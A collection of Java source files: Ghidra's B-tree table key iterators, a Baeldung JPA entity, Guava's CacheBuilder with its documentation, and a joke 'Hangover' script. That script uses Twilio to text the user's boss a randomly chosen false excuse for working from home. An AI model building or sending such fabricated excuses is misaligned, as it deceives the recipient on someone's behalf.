keyIter = new ShortDurationFieldKeyIterator(minKey, maxKey, startKey);
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD) {
if (++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter = new LongDurationFieldKeyIterator((ShortDurationFieldKeyIterator) keyIter);
}
}
return keyIter.hasNext();
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (iterCnt <= SHORT_ITER_THRESHOLD) {
if (++iterCnt > SHORT_ITER_THRESHOLD) {
// Switch to long-running iterator
keyIter = new LongDurationFieldKeyIterator((ShortDurationFieldKeyIterator) keyIter);
}
}
return keyIter.hasPrevious();
}
}
@Override
public Field next() throws IOException {
return keyIter.next();
}
@Override
public Field previous() throws IOException {
return keyIter.previous();
}
@Override
public boolean delete() throws IOException {
return keyIter.delete();
}
}
/**
* A Field key iterator class - optimized for long iterations since
* all keys are read for each record node.
*/
private class LongDurationFieldKeyIterator implements DBFieldIterator {
private int bufferId;
private int keyIndex;
private Field[] keys;
private Field key;
private Field lastKey;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private Field minKey;
private Field maxKey;
/**
* Iterator hand-off constructor. Transition from short-running to
* long-running iterator.
* @param keyIter partially used short-running iterator
* @throws IOException if IO error occurs
*/
LongDurationFieldKeyIterator(ShortDurationFieldKeyIterator keyIter) throws IOException {
this.bufferId = keyIter.bufferId;
this.keyIndex = keyIter.keyIndex;
this.key = keyIter.key;
this.lastKey = keyIter.lastKey;
this.expectedModCount = keyIter.expectedModCount;
this.hasPrev = keyIter.hasPrev;
this.hasNext = keyIter.hasNext;
this.minKey = keyIter.minKey;
this.maxKey = keyIter.maxKey;
if (bufferId >= 0) {
if (modCount != expectedModCount) {
reset();
}
else {
try {
FieldKeyRecordNode leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
getKeys(leaf);
}
finally {
nodeMgr.releaseNodes();
}
}
}
}
/**
		 * Initialize (or re-initialize) iterator state. (requires DBHandle lock)
		 * An empty or null keys array will force a complete initialization.
		 * Otherwise, following a delete, the keys array and keyIndex should reflect the
		 * post-delete state.
* @param targetKey the initial key. For construction this is the startKey,
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(Field targetKey) throws IOException {
expectedModCount = modCount;
hasNext = false;
hasPrev = false;
if (rootBufferId < 0) {
keys = Field.EMPTY_ARRAY;
bufferId = -1;
return;
}
try {
FieldKeyRecordNode leaf = null;
if (keys == null || keys.length == 0) {
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
if (targetKey == null) {
targetKey = minKey;
}
// If startKey not specified, start with leftmost record
if (targetKey == null) {
leaf = rootNode.getLeftmostLeafNode();
getKeys(leaf);
key = keys[0];
keyIndex = 0;
hasNext = true;
return;
}
leaf = rootNode.getLeafNode(targetKey);
getKeys(leaf);
// Empty leaf node - special case
if (keys.length == 0) {
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
}
// Start key was found
if (keyIndex >= 0) {
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == keys.length) {
--keyIndex;
hasPrev = minKey == null ? true : (keys[keyIndex].compareTo(minKey) >= 0);
if (!hasPrev) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getNextLeaf();
if (leaf == null) {
keys = Field.EMPTY_ARRAY;
bufferId = -1;
return;
}
keyIndex = 0;
getKeys(leaf);
hasNext =
maxKey == null ? true : (keys[keyIndex].compareTo(maxKey) <= 0);
}
}
else {
hasNext = maxKey == null ? true : (keys[keyIndex].compareTo(maxKey) <= 0);
if (!hasNext) {
// position to previous record
if (keyIndex == 0) {
if (leaf == null) {
keys = null;
initialize(targetKey);
return;
}
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
keys = Field.EMPTY_ARRAY;
bufferId = -1;
return;
}
keyIndex = leaf.getKeyCount() - 1;
getKeys(leaf);
}
else {
--keyIndex;
}
hasPrev =
minKey == null ? true : (keys[keyIndex].compareTo(minKey) >= 0);
}
}
if (hasNext || hasPrev) {
key = keys[keyIndex];
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
		 * Reset iterator (requires DBHandle lock)
* @throws IOException if IO error occurs
*/
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
keys = null;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
private void getKeys(FieldKeyRecordNode node) throws IOException {
bufferId = node.getBufferId();
int keyCount = node.getKeyCount();
if (keys == null || keys.length != keyCount) {
keys = new Field[keyCount];
}
for (int i = 0; i < keyCount; i++) {
keys[i] = node.getKeyField(i);
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
if (bufferId < 0) {
return false;
}
// Check next key index
int nextIndex = keyIndex + 1;
// Process next leaf if needed
if (nextIndex >= keys.length) {
try {
FieldKeyRecordNode leaf =
((FieldKeyRecordNode) getFieldKeyNode(bufferId)).getNextLeaf();
if (leaf == null ||
(maxKey != null && leaf.getKeyField(0).compareTo(maxKey) > 0)) {
return false;
}
getKeys(leaf);
key = keys[0];
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasNext = maxKey == null || keys[nextIndex].compareTo(maxKey) <= 0;
if (hasNext) {
key = keys[nextIndex];
keyIndex = nextIndex;
hasPrev = false;
}
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
if (bufferId < 0) {
return false;
}
// Check previous key index
int prevIndex = keyIndex - 1;
// Process previous leaf if needed
if (prevIndex < 0) {
try {
FieldKeyRecordNode leaf =
((FieldKeyRecordNode) getFieldKeyNode(bufferId)).getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.getKeyCount() - 1;
if (minKey != null &&
leaf.getKeyField(prevIndex).compareTo(minKey) < 0) {
return false;
}
getKeys(leaf);
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
finally {
nodeMgr.releaseNodes();
}
}
// else, use keys cache
else {
hasPrev = minKey == null || keys[prevIndex].compareTo(minKey) >= 0;
if (hasPrev) {
key = keys[prevIndex];
keyIndex = prevIndex;
hasNext = false;
}
}
}
return hasPrev;
}
}
@Override
public Field next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
return key;
}
return null;
}
@Override
public Field previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
return key;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastKey != null) {
synchronized (db) {
Field deleteKey = lastKey;
lastKey = null;
boolean success = deleteRecord(deleteKey);
int newLen = keys.length - 1;
if (deleteKey.equals(key) && keys.length > 1 && keyIndex < newLen) {
Field[] newKeys = new Field[newLen];
System.arraycopy(keys, 0, newKeys, 0, keyIndex);
System.arraycopy(keys, keyIndex + 1, newKeys, keyIndex, newLen - keyIndex);
keys = newKeys;
keyIndex = -(keyIndex + 1); // reflects non-existent key to initialize method
}
else {
keys = null;
}
initialize(deleteKey);
return success;
}
}
return false;
}
}
/**
* A Field key iterator class - optimized for short iterations since
* the number of keys read from each record node is minimized.
*/
private class ShortDurationFieldKeyIterator implements DBFieldIterator {
private int bufferId;
private int keyIndex;
private Field lastKey;
private Field key;
private int expectedModCount;
private boolean hasPrev;
private boolean hasNext;
private Field minKey;
private Field maxKey;
/**
* Construct a record iterator. (requires DBHandle lock)
* @param minKey minimum key value. Null corresponds to minimum key value.
* @param maxKey maximum key value. Null corresponds to maximum key value.
* @param startKey the first primary key value. If null, minKey will be assumed;
* if still null, the minimum indexed value will be assumed.
* @throws IOException if IO error occurs
*/
ShortDurationFieldKeyIterator(Field minKey, Field maxKey, Field startKey) throws IOException {
this.minKey = minKey;
this.maxKey = maxKey;
this.key = startKey;
initialize(startKey);
}
/**
* Initialize (or re-initialize) iterator state. Unlike the long-duration iterator,
* no keys array is cached here; position is always re-derived from the leaf node.
* @param targetKey the initial key. For construction this is the startKey;
* following a delete this is the deleted key.
* @throws IOException thrown if IO error occurs
*/
private void initialize(Field targetKey) throws IOException {
expectedModCount = modCount;
hasNext = false;
hasPrev = false;
bufferId = -1;
if (rootBufferId < 0) {
return;
}
try {
FieldKeyRecordNode leaf;
FieldKeyNode rootNode = getFieldKeyNode(rootBufferId);
if (targetKey == null) {
targetKey = minKey;
}
// If startKey not specified, start with leftmost record
if (targetKey == null) {
leaf = rootNode.getLeftmostLeafNode();
bufferId = leaf.getBufferId();
key = leaf.getKeyField(0);
keyIndex = 0;
hasNext = true;
return;
}
leaf = rootNode.getLeafNode(targetKey);
bufferId = leaf.getBufferId();
// Empty leaf node - special case
if (leaf.getKeyCount() == 0) {
keyIndex = -1;
return;
}
keyIndex = leaf.getKeyIndex(targetKey);
// Start key was found
if (keyIndex >= 0) {
key = leaf.getKeyField(keyIndex);
hasPrev = true;
hasNext = true;
}
// Start key was not found
else {
keyIndex = -(keyIndex + 1);
if (keyIndex == leaf.getKeyCount()) {
--keyIndex;
key = leaf.getKeyField(keyIndex);
hasPrev = minKey == null ? true : (key.compareTo(minKey) >= 0);
}
else {
key = leaf.getKeyField(keyIndex);
hasNext = maxKey == null ? true : (key.compareTo(maxKey) <= 0);
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
/**
* Reset iterator (requires DBHandle lock)
* @throws IOException if IO error occurs
*/
private void reset() throws IOException {
boolean hadNext = hasNext;
boolean hadPrev = hasPrev;
initialize(key);
if (hasNext && hasPrev) {
hasNext = hadNext;
hasPrev = hadPrev;
}
}
@Override
public boolean hasNext() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasNext) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check next key index
int nextIndex = keyIndex + 1;
try {
// Process next leaf if needed
FieldKeyRecordNode leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
if (nextIndex >= leaf.getKeyCount()) {
leaf = leaf.getNextLeaf();
if (leaf == null) {
return false;
}
Field nextKey = leaf.getKeyField(0);
if (maxKey != null && nextKey.compareTo(maxKey) > 0) {
return false;
}
bufferId = leaf.getBufferId();
key = nextKey;
keyIndex = 0;
hasNext = true;
hasPrev = false;
}
// else, use keys cache
else {
Field nextKey = leaf.getKeyField(nextIndex);
hasNext = maxKey == null ? true : (nextKey.compareTo(maxKey) <= 0);
if (hasNext) {
key = nextKey;
keyIndex = nextIndex;
hasPrev = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasNext;
}
}
@Override
public boolean hasPrevious() throws IOException {
synchronized (db) {
if (modCount != expectedModCount) {
reset();
}
if (!hasPrev) {
if (bufferId < 0 || keyIndex < 0) {
return false;
}
// Check previous key index
int prevIndex = keyIndex - 1;
try {
// Process previous leaf if needed
FieldKeyRecordNode leaf = (FieldKeyRecordNode) getFieldKeyNode(bufferId);
if (prevIndex < 0) {
leaf = leaf.getPreviousLeaf();
if (leaf == null) {
return false;
}
prevIndex = leaf.getKeyCount() - 1;
Field prevKey = leaf.getKeyField(prevIndex);
if (minKey != null && prevKey.compareTo(minKey) < 0) {
return false;
}
bufferId = leaf.getBufferId();
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
hasPrev = true;
}
// else, use keys cache
else {
Field prevKey = leaf.getKeyField(prevIndex);
hasPrev = minKey == null ? true : (prevKey.compareTo(minKey) >= 0);
if (hasPrev) {
key = prevKey;
keyIndex = prevIndex;
hasNext = false;
}
}
}
finally {
nodeMgr.releaseNodes();
}
}
return hasPrev;
}
}
@Override
public Field next() throws IOException {
if (hasNext || hasNext()) {
hasNext = false;
hasPrev = true;
lastKey = key;
return key;
}
return null;
}
@Override
public Field previous() throws IOException {
if (hasPrev || hasPrevious()) {
hasNext = true;
hasPrev = false;
lastKey = key;
return key;
}
return null;
}
@Override
public boolean delete() throws IOException {
if (lastKey != null) {
Field deleteKey = lastKey;
lastKey = null;
return deleteRecord(deleteKey);
}
return false;
}
}
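/*
 * Editor's sketch (not part of the original source): the iterators above all implement
 * the DBFieldIterator contract, which a caller would typically drive as shown below.
 * The table.fieldKeyIterator(...) accessor used here is an assumed/hypothetical entry
 * point, included for illustration only.
 *
 *   DBFieldIterator it = table.fieldKeyIterator(minKey, maxKey, startKey);
 *   while (it.hasNext()) {
 *       Field key = it.next();   // null only when the iterator is exhausted
 *       if (shouldRemove(key)) {
 *           it.delete();         // deletes the record for the last key returned
 *       }
 *   }
 */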
/**
* @return true if this table has been invalidated and may no longer be used
*/
public boolean isInvalid() {
return nodeMgr == null;
}
@Override
public String toString() {
return getName() + "(" + getRecordCount() + ")";
}
}
| NationalSecurityAgency/ghidra | Ghidra/Framework/DB/src/main/java/db/Table.java |
1,118 | package com.baeldung.web;
import jakarta.persistence.Entity;
import jakarta.persistence.GeneratedValue;
import jakarta.persistence.GenerationType;
import jakarta.persistence.Id;
@Entity
public class Foo {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private long id;
private String name;
public Foo() {
super();
}
public Foo(final String name) {
super();
this.name = name;
}
public Foo(final long id, final String name) {
super();
this.id = id;
this.name = name;
}
// API
public long getId() {
return id;
}
public void setId(final long id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(final String name) {
this.name = name;
}
//
@Override
public int hashCode() {
final int prime = 31;
int result = 1;
result = prime * result + ((name == null) ? 0 : name.hashCode());
return result;
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (getClass() != obj.getClass())
return false;
Foo other = (Foo) obj;
if (name == null) {
if (other.name != null)
return false;
} else if (!name.equals(other.name))
return false;
return true;
}
@Override
public String toString() {
return "Foo [name=" + name + "]";
}
} | eugenp/tutorials | spring-5/src/main/java/com/baeldung/web/Foo.java |
1,120 | import com.twilio.sdk.TwilioRestClient;
import com.twilio.sdk.TwilioRestException;
import com.twilio.sdk.resource.factory.MessageFactory;
import com.twilio.sdk.resource.instance.Message;
import org.apache.http.NameValuePair;
import org.apache.http.message.BasicNameValuePair;
import java.util.ArrayList;
import java.util.List;
import java.util.Random;
public class Hangover {
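// Twilio credentials are read from environment variables; the two phone numbers below
// are placeholders and must be replaced with real sender/recipient numbers.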
public static final String ACCOUNT_SID = System.getenv("TWILIO_ACCOUNT_SID");
public static final String AUTH_TOKEN = System.getenv("TWILIO_AUTH_TOKEN");
public static final String YOUR_NUMBER = "1231231231";
public static final String BOSS_NUMBER = "3213213213";
public static void main(String[] args) throws TwilioRestException {
TwilioRestClient client = new TwilioRestClient(ACCOUNT_SID, AUTH_TOKEN);
String[] randomMessages = {
"Locked out",
"Pipes broke",
"Food poisoning",
"Not feeling well"
};
int randomIndex = new Random().nextInt(randomMessages.length);
String finalMessage = randomMessages[randomIndex];
List<NameValuePair> params = new ArrayList<NameValuePair>();
params.add(new BasicNameValuePair("Body", "Gonna work from home. " + finalMessage));
params.add(new BasicNameValuePair("From", YOUR_NUMBER));
params.add(new BasicNameValuePair("To", BOSS_NUMBER));
MessageFactory messageFactory = client.getAccount().getMessageFactory();
Message message = messageFactory.create(params);
System.out.println(message.getSid());
}
}
| NARKOZ/hacker-scripts | java/Hangover.java |
1,123 | /*
* Copyright (C) 2009 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.cache;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.base.Preconditions.checkState;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.base.Ascii;
import com.google.common.base.Equivalence;
import com.google.common.base.MoreObjects;
import com.google.common.base.Supplier;
import com.google.common.base.Suppliers;
import com.google.common.base.Ticker;
import com.google.common.cache.AbstractCache.SimpleStatsCounter;
import com.google.common.cache.AbstractCache.StatsCounter;
import com.google.common.cache.LocalCache.Strength;
import com.google.errorprone.annotations.CanIgnoreReturnValue;
import java.lang.ref.SoftReference;
import java.lang.ref.WeakReference;
import java.util.ConcurrentModificationException;
import java.util.IdentityHashMap;
import java.util.Map;
import java.util.concurrent.TimeUnit;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.annotation.CheckForNull;
/**
* A builder of {@link LoadingCache} and {@link Cache} instances.
*
* <h2>Prefer <a href="https://github.com/ben-manes/caffeine/wiki">Caffeine</a> over Guava's caching
* API</h2>
*
* <p>The successor to Guava's caching API is <a
* href="https://github.com/ben-manes/caffeine/wiki">Caffeine</a>. Its API is designed to make it a
* nearly drop-in replacement. It requires Java 8+, and is not available for Android or GWT/J2CL,
* and may have <a href="https://github.com/ben-manes/caffeine/wiki/Guava">different (usually
* better) behavior</a> when multiple threads attempt concurrent mutations. Its equivalent to {@code
* CacheBuilder} is its <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/Caffeine.html">{@code
* Caffeine}</a> class. Caffeine offers better performance, more features (including asynchronous
* loading), and fewer <a
* href="https://github.com/google/guava/issues?q=is%3Aopen+is%3Aissue+label%3Apackage%3Dcache+label%3Atype%3Ddefect">bugs</a>.
*
* <p>Caffeine defines its own interfaces (<a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/Cache.html">{@code
* Cache}</a>, <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/LoadingCache.html">{@code
* LoadingCache}</a>, <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/CacheLoader.html">{@code
* CacheLoader}</a>, etc.), so you can use Caffeine without needing to use any Guava types.
* Caffeine's types are better than Guava's, especially for <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/AsyncLoadingCache.html">their
* deep support for asynchronous operations</a>. But if you want to migrate to Caffeine with minimal
* code changes, you can use <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/guava/latest/com.github.benmanes.caffeine.guava/com/github/benmanes/caffeine/guava/CaffeinatedGuava.html">its
* {@code CaffeinatedGuava} adapter class</a>, which lets you build a Guava {@code Cache} or a Guava
* {@code LoadingCache} backed by a Guava {@code CacheLoader}.
*
* <p>Caffeine's API for asynchronous operations uses {@code CompletableFuture}: <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/AsyncLoadingCache.html#get(K)">{@code
* AsyncLoadingCache.get}</a> returns a {@code CompletableFuture}, and implementations of <a
* href="https://www.javadoc.io/doc/com.github.ben-manes.caffeine/caffeine/latest/com.github.benmanes.caffeine/com/github/benmanes/caffeine/cache/AsyncCacheLoader.html#asyncLoad(K,java.util.concurrent.Executor)">{@code
* AsyncCacheLoader.asyncLoad}</a> must return a {@code CompletableFuture}. Users of Guava's {@link
* com.google.common.util.concurrent.ListenableFuture} can adapt between the two {@code Future}
* types by using <a href="https://github.com/lukas-krecan/future-converter#java8-guava">{@code
* net.javacrumbs.futureconverter.java8guava.FutureConverter}</a>.
*
* <h2>More on {@code CacheBuilder}</h2>
*
* {@code CacheBuilder} builds caches with any combination of the following features:
*
* <ul>
* <li>automatic loading of entries into the cache
* <li>least-recently-used eviction when a maximum size is exceeded (note that the cache is
* divided into segments, each of which does LRU internally)
* <li>time-based expiration of entries, measured since last access or last write
* <li>keys automatically wrapped in {@code WeakReference}
* <li>values automatically wrapped in {@code WeakReference} or {@code SoftReference}
* <li>notification of evicted (or otherwise removed) entries
* <li>accumulation of cache access statistics
* </ul>
*
* <p>These features are all optional; caches can be created using all or none of them. By default,
* cache instances created by {@code CacheBuilder} will not perform any type of eviction.
*
* <p>Usage example:
*
* <pre>{@code
* LoadingCache<Key, Graph> graphs = CacheBuilder.newBuilder()
* .maximumSize(10000)
* .expireAfterWrite(10, TimeUnit.MINUTES)
* .removalListener(MY_LISTENER)
* .build(
* new CacheLoader<Key, Graph>() {
* public Graph load(Key key) throws AnyException {
* return createExpensiveGraph(key);
* }
* });
* }</pre>
*
* <p>Or equivalently,
*
* <pre>{@code
* // In real life this would come from a command-line flag or config file
* String spec = "maximumSize=10000,expireAfterWrite=10m";
*
* LoadingCache<Key, Graph> graphs = CacheBuilder.from(spec)
* .removalListener(MY_LISTENER)
* .build(
* new CacheLoader<Key, Graph>() {
* public Graph load(Key key) throws AnyException {
* return createExpensiveGraph(key);
* }
* });
* }</pre>
*
* <p>The returned cache implements all optional operations of the {@link LoadingCache} and {@link
* Cache} interfaces. The {@code asMap} view (and its collection views) have <i>weakly consistent
* iterators</i>. This means that they are safe for concurrent use, but if other threads modify the
* cache after the iterator is created, it is undefined which of these changes, if any, are
* reflected in that iterator. These iterators never throw {@link ConcurrentModificationException}.
*
* <p><b>Note:</b> by default, the returned cache uses equality comparisons (the {@link
* Object#equals equals} method) to determine equality for keys or values. However, if {@link
* #weakKeys} was specified, the cache uses identity ({@code ==}) comparisons instead for keys.
* Likewise, if {@link #weakValues} or {@link #softValues} was specified, the cache uses identity
* comparisons for values.
*
* <p>Entries are automatically evicted from the cache when any of {@link #maximumSize(long)
* maximumSize}, {@link #maximumWeight(long) maximumWeight}, {@link #expireAfterWrite
* expireAfterWrite}, {@link #expireAfterAccess expireAfterAccess}, {@link #weakKeys weakKeys},
* {@link #weakValues weakValues}, or {@link #softValues softValues} are requested.
*
* <p>If {@link #maximumSize(long) maximumSize} or {@link #maximumWeight(long) maximumWeight} is
* requested entries may be evicted on each cache modification.
*
* <p>If {@link #expireAfterWrite expireAfterWrite} or {@link #expireAfterAccess expireAfterAccess}
* is requested entries may be evicted on each cache modification, on occasional cache accesses, or
* on calls to {@link Cache#cleanUp}. Expired entries may be counted by {@link Cache#size}, but will
* never be visible to read or write operations.
*
* <p>If {@link #weakKeys weakKeys}, {@link #weakValues weakValues}, or {@link #softValues
* softValues} are requested, it is possible for a key or value present in the cache to be reclaimed
* by the garbage collector. Entries with reclaimed keys or values may be removed from the cache on
* each cache modification, on occasional cache accesses, or on calls to {@link Cache#cleanUp}; such
* entries may be counted in {@link Cache#size}, but will never be visible to read or write
* operations.
*
* <p>Certain cache configurations will result in the accrual of periodic maintenance tasks which
* will be performed during write operations, or during occasional read operations in the absence of
* writes. The {@link Cache#cleanUp} method of the returned cache will also perform maintenance, but
* calling it should not be necessary with a high throughput cache. Only caches built with {@link
* #removalListener removalListener}, {@link #expireAfterWrite expireAfterWrite}, {@link
* #expireAfterAccess expireAfterAccess}, {@link #weakKeys weakKeys}, {@link #weakValues
* weakValues}, or {@link #softValues softValues} perform periodic maintenance.
*
* <p>The caches produced by {@code CacheBuilder} are serializable, and the deserialized caches
* retain all the configuration properties of the original cache. Note that the serialized form does
* <i>not</i> include cache contents, but only configuration.
*
* <p>See the Guava User Guide article on <a
* href="https://github.com/google/guava/wiki/CachesExplained">caching</a> for a higher-level
* explanation.
*
* @param <K> the most general key type this builder will be able to create caches for. This is
* normally {@code Object} unless it is constrained by using a method like {@code
* #removalListener}. Cache keys may not be null.
* @param <V> the most general value type this builder will be able to create caches for. This is
* normally {@code Object} unless it is constrained by using a method like {@code
* #removalListener}. Cache values may not be null.
* @author Charles Fry
* @author Kevin Bourrillion
* @since 10.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public final class CacheBuilder<K, V> {
private static final int DEFAULT_INITIAL_CAPACITY = 16;
private static final int DEFAULT_CONCURRENCY_LEVEL = 4;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
private static final int DEFAULT_EXPIRATION_NANOS = 0;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
private static final int DEFAULT_REFRESH_NANOS = 0;
static final Supplier<? extends StatsCounter> NULL_STATS_COUNTER =
Suppliers.ofInstance(
new StatsCounter() {
@Override
public void recordHits(int count) {}
@Override
public void recordMisses(int count) {}
@SuppressWarnings("GoodTime") // b/122668874
@Override
public void recordLoadSuccess(long loadTime) {}
@SuppressWarnings("GoodTime") // b/122668874
@Override
public void recordLoadException(long loadTime) {}
@Override
public void recordEviction() {}
@Override
public CacheStats snapshot() {
return EMPTY_STATS;
}
});
static final CacheStats EMPTY_STATS = new CacheStats(0, 0, 0, 0, 0, 0);
/*
* We avoid using a method reference or lambda here for now:
*
* - method reference: Inside Google, CacheBuilder is used from the implementation of a custom
* ClassLoader that is sometimes used as a system classloader. That's a problem because
* method-reference linking tries to look up the system classloader, and it fails because there
* isn't one yet.
*
* - lambda: Outside Google, we got a report of a similar problem in
* https://github.com/google/guava/issues/6565
*/
@SuppressWarnings("AnonymousToLambda")
static final Supplier<StatsCounter> CACHE_STATS_COUNTER =
new Supplier<StatsCounter>() {
@Override
public StatsCounter get() {
return new SimpleStatsCounter();
}
};
enum NullListener implements RemovalListener<Object, Object> {
INSTANCE;
@Override
public void onRemoval(RemovalNotification<Object, Object> notification) {}
}
enum OneWeigher implements Weigher<Object, Object> {
INSTANCE;
@Override
public int weigh(Object key, Object value) {
return 1;
}
}
static final Ticker NULL_TICKER =
new Ticker() {
@Override
public long read() {
return 0;
}
};
// We use a holder class to delay initialization: https://github.com/google/guava/issues/6566
private static final class LoggerHolder {
static final Logger logger = Logger.getLogger(CacheBuilder.class.getName());
}
static final int UNSET_INT = -1;
boolean strictParsing = true;
int initialCapacity = UNSET_INT;
int concurrencyLevel = UNSET_INT;
long maximumSize = UNSET_INT;
long maximumWeight = UNSET_INT;
@CheckForNull Weigher<? super K, ? super V> weigher;
@CheckForNull Strength keyStrength;
@CheckForNull Strength valueStrength;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
long expireAfterWriteNanos = UNSET_INT;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
long expireAfterAccessNanos = UNSET_INT;
@SuppressWarnings("GoodTime") // should be a java.time.Duration
long refreshNanos = UNSET_INT;
@CheckForNull Equivalence<Object> keyEquivalence;
@CheckForNull Equivalence<Object> valueEquivalence;
@CheckForNull RemovalListener<? super K, ? super V> removalListener;
@CheckForNull Ticker ticker;
Supplier<? extends StatsCounter> statsCounterSupplier = NULL_STATS_COUNTER;
private CacheBuilder() {}
/**
* Constructs a new {@code CacheBuilder} instance with default settings, including strong keys,
* strong values, and no automatic eviction of any kind.
*
* <p>Note that while this return type is {@code CacheBuilder<Object, Object>}, type parameters on
* the {@link #build} methods allow you to create a cache of any key and value type desired.
*/
public static CacheBuilder<Object, Object> newBuilder() {
return new CacheBuilder<>();
}
/**
* Constructs a new {@code CacheBuilder} instance with the settings specified in {@code spec}.
*
* @since 12.0
*/
@GwtIncompatible // To be supported
public static CacheBuilder<Object, Object> from(CacheBuilderSpec spec) {
return spec.toCacheBuilder().lenientParsing();
}
/**
* Constructs a new {@code CacheBuilder} instance with the settings specified in {@code spec}.
* This is especially useful for command-line configuration of a {@code CacheBuilder}.
*
* @param spec a String in the format specified by {@link CacheBuilderSpec}
* @since 12.0
*/
@GwtIncompatible // To be supported
public static CacheBuilder<Object, Object> from(String spec) {
return from(CacheBuilderSpec.parse(spec));
}
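/*
 * Editor's sketch (not part of the Guava source): building a cache from a spec string,
 * reusing the "maximumSize=10000,expireAfterWrite=10m" example from the class javadoc.
 * Key, Graph and createExpensiveGraph(...) are assumed placeholder names.
 *
 *   LoadingCache<Key, Graph> graphs =
 *       CacheBuilder.from("maximumSize=10000,expireAfterWrite=10m")
 *           .recordStats()
 *           .build(CacheLoader.from(key -> createExpensiveGraph(key)));
 */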
/**
* Enables lenient parsing. Useful for tests and spec parsing.
*
* @return this {@code CacheBuilder} instance (for chaining)
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
CacheBuilder<K, V> lenientParsing() {
strictParsing = false;
return this;
}
/**
* Sets a custom {@code Equivalence} strategy for comparing keys.
*
* <p>By default, the cache uses {@link Equivalence#identity} to determine key equality when
* {@link #weakKeys} is specified, and {@link Equivalence#equals()} otherwise.
*
* @return this {@code CacheBuilder} instance (for chaining)
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
CacheBuilder<K, V> keyEquivalence(Equivalence<Object> equivalence) {
checkState(keyEquivalence == null, "key equivalence was already set to %s", keyEquivalence);
keyEquivalence = checkNotNull(equivalence);
return this;
}
Equivalence<Object> getKeyEquivalence() {
return MoreObjects.firstNonNull(keyEquivalence, getKeyStrength().defaultEquivalence());
}
/**
* Sets a custom {@code Equivalence} strategy for comparing values.
*
* <p>By default, the cache uses {@link Equivalence#identity} to determine value equality when
* {@link #weakValues} or {@link #softValues} is specified, and {@link Equivalence#equals()}
* otherwise.
*
* @return this {@code CacheBuilder} instance (for chaining)
*/
@GwtIncompatible // To be supported
@CanIgnoreReturnValue
CacheBuilder<K, V> valueEquivalence(Equivalence<Object> equivalence) {
checkState(
valueEquivalence == null, "value equivalence was already set to %s", valueEquivalence);
this.valueEquivalence = checkNotNull(equivalence);
return this;
}
Equivalence<Object> getValueEquivalence() {
